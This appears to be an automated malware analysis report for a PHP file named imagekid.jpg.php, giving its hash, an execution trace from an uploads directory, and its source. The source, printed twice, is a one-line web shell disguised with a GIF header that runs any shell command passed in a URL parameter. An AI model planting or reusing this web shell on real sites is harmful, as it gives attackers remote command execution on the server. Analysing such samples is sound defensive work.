PHP Malware Analysis

imagekid.jpg.php

md5: b42459bd3260189393e2ed283528a3d3

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

GIF89a; <?php 
system($_GET['cmd']);

Execution traces

data/traces/b42459bd3260189393e2ed283528a3d3_trace-1676239935.0885.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:12:40.986435]
1	0	1	0.000385	393584
1	3	0	0.000456	394096	{main}	1		/var/www/html/uploads/imagekid.jpg.php	0	0
2	4	0	0.000520	394096	system	0		/var/www/html/uploads/imagekid.jpg.php	1	1	NULL
2	4	1	0.000553	394128
2	4	R			FALSE
1	3	1	0.000568	394096
			0.000626	314272
TRACE END   [2023-02-12 20:12:40.986722]


Generated HTML code

<html><head></head><body>GIF89a; </body></html>

Original PHP code

GIF89a; <?php system($_GET['cmd']); ?>